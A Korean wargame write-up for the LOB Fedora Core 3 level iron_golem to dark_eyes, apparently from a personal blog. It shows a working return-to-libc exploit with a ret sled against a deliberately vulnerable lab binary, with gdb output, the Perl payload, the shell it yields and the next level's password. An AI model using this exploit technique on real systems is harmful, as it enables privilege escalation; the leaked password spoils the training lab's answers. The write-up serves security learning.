Wargame/LOB_FC

[LOB_FC3] iron_golem -> dark_eyes

bbolmin 2014. 7. 12. 11:28



#Env 


- NX

- ascii armor

- random stack


#Technic


- &ret sled로 RTL 인자 구성




dark_eyes.c 소스



sfp를 복구하는 과정이 추가 되어있고 힌트로 RET sleding을 주었다. RET sleding을 하는데 SFP는 필요 없으므로 "gate->iron_golem" 문제와 동일한 방법으로 풀면 되겠다.








[payload 작성]


[iron_golem@Fedora_1stFloor ~]$ strace -i ./dark_eyes `perl -e 'print "A"x270'`

[007037c0] execve("./dark_eyes", ["./dark_eyes", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
.... 생략 ...

[00004141] --- SIGSEGV (Segmentation fault) @ 0 (0) ---

upeek: ptrace(PTRACE_PEEKUSER,3094,48,0): No such process

[????????] +++ killed by SIGSEGV +++

[iron_golem@Fedora_1stFloor ~]$


=> 268 + 4byte(ret)인 것을 확인



(gdb) x/i 0x080484b9

0x80484b9 <main+177>:   ret


(gdb) p execl

$2 = {<text variable, no debug info>} 0x7a5720 <execl>


(gdb) x/40x $esp+0x120

0xfef33920:     0x61616161      0x61616161      0x61616161      0x61616161

0xfef33930:     0x61616161      0x61616161      0x61616161      0x61616161

0xfef33940:     0x00000000      0xfef339c4      0xfef339d0      0x0070eab6

0xfef33950:     0x0083eff4      0x00000000      0xfef33950      0xfef33998

0xfef33960:     0xfef33940      0x00730df5      0x00000000      0x00000000

0xfef33970:     0x00000000      0x00718fb4      0x00000002      0x08048360


=> 
&ret = 0x80484b9 
&execl = 0x7a5720
execl(0x0070eab6, 0x0083eff4, 0x00000000)

payload : |   268 dummy  |  &ret x 2 | &execl | dummy(4) | 0x0070eab6, 0x0083eff4, 0x00000000 ......



공격코드 : ./dark_eyes  "`perl -e 'print "a"x268, "\xb9\x84\x04\x08"x2, "\x20\x57\x7a"'`"


[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes  "`perl -e 'print "a"x268, "\xb9\x84\x04\x08"x2, "\x20\x57\x7a"'`"

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa삻蕓뭐 Wz

sh-3.00$ id

uid=502(dark_eyes) gid=502(dark_eyes) groups=501(iron_golem) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 502

because of you

sh-3.00$